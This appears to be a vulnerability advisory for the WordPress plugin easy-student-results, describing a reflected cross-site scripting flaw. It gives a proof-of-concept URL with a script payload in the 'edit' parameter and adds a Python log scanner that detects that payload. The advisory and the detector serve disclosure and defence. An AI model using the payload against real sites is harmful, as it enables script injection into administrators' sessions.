The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=rps_result_batch&edit=<script>alert(/XSS/)</script>
CPE

Name | Operator | Version
---|---|---
easy-student-results | eq | *
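
A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to `admin.php?page=rps_result_batch` whose `edit` value contains HTML metacharacters after decoding. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines; the combined log format is an assumption.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=rps_result_batch&edit=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin.php?page=rps_result_batch&edit=%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E HTTP/1.1" 200 5177',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=rps_result_batch&edit=%253Cb%253E HTTP/1.1" 200 5130',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /wp-admin/admin.php?page=other_page&edit=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out of HTML text or an attribute.
MARKUP = re.compile(r"[<>\"'`]")


def decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_edit_value(log_line):
    """Return the decoded `edit` value if it carries markup, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    on_target = url.path.endswith("/wp-admin/admin.php")
    if not on_target or "rps_result_batch" not in params.get("page", []):
        return None
    for raw in params.get("edit", []):
        value = decode_fully(raw)
        if MARKUP.search(value):
            return value
    return None


def flag_lines(lines):
    """Return (line_index, decoded_value) for every flagged line."""
    found = ((i, suspicious_edit_value(line)) for i, line in enumerate(lines))
    return [(i, v) for i, v in found if v is not None]
```

Calling `flag_lines(SAMPLE_LOG)` returns the second and third sample lines; the third is flagged only because the extra decoding pass unwraps a double-encoded value.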